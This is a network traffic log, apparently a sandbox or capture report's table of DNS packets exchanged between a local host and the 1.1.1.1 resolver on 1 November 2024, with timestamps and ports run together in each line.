                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.092627048 CET6168253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.099896908 CET53616821.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.073529959 CET5894253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.081044912 CET53589421.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.944441080 CET5136653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.953557968 CET53513661.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.527856112 CET5100753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.535139084 CET53510071.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.535969019 CET6520353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.543133974 CET53652031.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.543942928 CET5762153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.954092026 CET53576211.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.405574083 CET5959653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.413685083 CET53595961.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.433751106 CET6077053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.441114902 CET53607701.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.157459021 CET6020653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.165719986 CET53602061.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.166537046 CET5640053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.173973083 CET53564001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.181376934 CET6177653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.189805984 CET53617761.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.040138006 CET5346853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.046597004 CET53534681.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.043476105 CET5388753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.051074982 CET53538871.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.268151045 CET5251353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.275680065 CET53525131.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.575942039 CET6083653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.584577084 CET53608361.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.043612003 CET6174753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.050651073 CET53617471.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.793040037 CET6179753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.800462961 CET53617971.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.520415068 CET5972153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.662981033 CET53597211.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.093365908 CET5917753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.284370899 CET53591771.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.291162968 CET6356553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.299175024 CET53635651.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.994280100 CET5060053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.002926111 CET53506001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.850527048 CET6349553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.857687950 CET53634951.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.325527906 CET6491053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.333060980 CET53649101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.048506021 CET5912853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.056732893 CET53591281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.251434088 CET4982453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.435003996 CET53498241.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.053553104 CET5018153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.061053038 CET53501811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.970058918 CET5765253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.977813005 CET53576521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.980676889 CET6323753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.220237970 CET53632371.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.588027954 CET53528061.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.729126930 CET6040053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.736718893 CET53604001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.589586020 CET6371453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.596513987 CET53637141.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.397078037 CET6339853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.404200077 CET53633981.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.404727936 CET4921253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.411453009 CET53492121.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.972453117 CET5870153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.979592085 CET53587011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.422909021 CET6318653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.430248022 CET53631861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.229377985 CET5645253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.237128973 CET53564521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.469060898 CET6313853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.655685902 CET53631381.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.540858030 CET5123853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.548228979 CET53512381.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.179589033 CET6124553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.187403917 CET53612451.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.600838900 CET6138153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.609018087 CET53613811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.777584076 CET4927953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.785809040 CET53492791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.325391054 CET6430253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.338011026 CET53643021.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.338583946 CET5243053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.345720053 CET53524301.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.041321039 CET5748353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.228034973 CET53574831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.822761059 CET5529253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.830248117 CET53552921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.840404034 CET4937253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.848195076 CET53493721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.303960085 CET5823553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.311336994 CET53582351.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.973665953 CET5800053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.974128008 CET5991953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.981630087 CET53599191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.981801987 CET53580001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.008445024 CET6059953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.015953064 CET53605991.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.472347975 CET5838053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.481019974 CET53583801.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.900262117 CET6381953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.907574892 CET53638191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.214235067 CET6511753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.222064018 CET53651171.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.070918083 CET6103353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.078264952 CET53610331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.106878042 CET5096353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.114361048 CET53509631.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.852778912 CET5956953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.860805035 CET53595691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.280549049 CET5605253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.291096926 CET53560521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.832566977 CET5498753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.839477062 CET53549871.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.268014908 CET53559391.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.115350962 CET5076253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.122436047 CET53507621.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.271426916 CET6181953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.278775930 CET53618191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.819504023 CET5856453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.827486992 CET53585641.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.361644030 CET5859353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.369088888 CET53585931.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.694372892 CET5525153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.701540947 CET53552511.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.819971085 CET6359553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.834882021 CET53635951.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.967329979 CET5454753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.974674940 CET53545471.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.952862024 CET5071153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.959924936 CET53507111.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.085788012 CET5785253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.093523026 CET53578521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.795110941 CET6552953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.802927971 CET53655291.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:13.592905045 CET6016453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:13.773571014 CET53601641.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.304894924 CET5228853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.313174963 CET53522881.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.126168966 CET6527253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.133600950 CET53652721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.765778065 CET4933553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.772970915 CET53493351.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.449249029 CET5295053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.456342936 CET53529501.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.556993961 CET5159053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.650964022 CET53515901.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.336863995 CET5390153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.344456911 CET53539011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.733479023 CET6473753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.740942955 CET53647371.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.104712009 CET5256353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.112207890 CET53525631.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.364041090 CET5782853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.371090889 CET53578281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.683653116 CET5763453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.691520929 CET53576341.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.387754917 CET5072653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.394785881 CET53507261.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.419096947 CET5244953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.426985025 CET53524491.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.468694925 CET5624153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.476361036 CET53562411.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.487046957 CET6447953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.494420052 CET53644791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.329443932 CET5252153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.336982012 CET53525211.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.487864971 CET5068253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.495480061 CET53506821.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.358624935 CET5206153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.366878033 CET53520611.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.786757946 CET5324253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.794403076 CET53532421.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.370387077 CET53562361.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.476851940 CET5747153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.484617949 CET53574711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.043606997 CET5765153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.050936937 CET53576511.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.199430943 CET5564953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.390686035 CET53556491.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.737610102 CET5440953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.744389057 CET53544091.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.496454954 CET5124653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.505466938 CET53512461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.580776930 CET6134653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.588015079 CET53613461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.284749985 CET6345253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.292068005 CET53634521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.648771048 CET6062053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.656529903 CET53606201.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.155620098 CET5193953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.163058043 CET53519391.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.841082096 CET5213953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.848386049 CET53521391.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.316668987 CET5439853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.324826002 CET53543981.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.702048063 CET5340553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.709767103 CET53534051.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.573610067 CET5263553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.580981016 CET53526351.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.945905924 CET6343253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.971286058 CET6343253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.140692949 CET53634321.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.140779972 CET53634321.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.487341881 CET5545053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.495069981 CET53554501.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.826889992 CET6045053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.834501982 CET53604501.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.510447025 CET5245253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.517462015 CET53524521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.940803051 CET5582953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.947649956 CET53558291.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.795550108 CET5843653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.802880049 CET53584361.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.958167076 CET5794853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.965199947 CET53579481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.505583048 CET6025353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.512531996 CET53602531.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.887681961 CET5834853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.894834995 CET53583481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.609889030 CET4953553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.617022991 CET53495351.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867886066 CET6126053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.876637936 CET53612601.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.877352953 CET6079153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.884747982 CET53607911.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.074178934 CET6041753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.082101107 CET53604171.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.321258068 CET5586853192.168.2.81.1.1.1
